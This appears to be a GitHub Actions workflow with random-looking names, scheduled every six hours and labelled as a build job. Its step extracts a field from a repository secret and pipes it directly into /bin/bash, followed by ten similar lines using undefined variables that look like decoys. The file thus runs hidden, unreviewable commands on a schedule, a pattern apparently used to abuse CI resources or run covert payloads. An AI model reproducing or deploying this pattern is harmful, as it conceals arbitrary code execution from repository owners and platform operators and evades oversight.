name: mingyulu1837

on:
  workflow_dispatch:
  schedule:
    - cron: '26 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: mingyulu1837
        env:
          n2: ${{ secrets.n2 }}
        run: |
          echo $n2 | jq -r .jp87419 | /bin/bash
          echo $mtkx52691 | jq -r .nop5001 | /bin/bash
          echo $qwvun3 | jq -r .wt64 | /bin/bash
          echo $ei9969 | jq -r .dgcsq1464 | /bin/bash
          echo $k3635 | jq -r .vtoyt75 | /bin/bash
          echo $uyyd83 | jq -r .drhlz3266 | /bin/bash
          echo $piz3998 | jq -r .nqv2 | /bin/bash
          echo $nu7901 | jq -r .qhg73892 | /bin/bash
          echo $jeqc69 | jq -r .cgw4 | /bin/bash
          echo $z1 | jq -r .i462 | /bin/bash
          echo $f35 | jq -r .u5 | /bin/bash

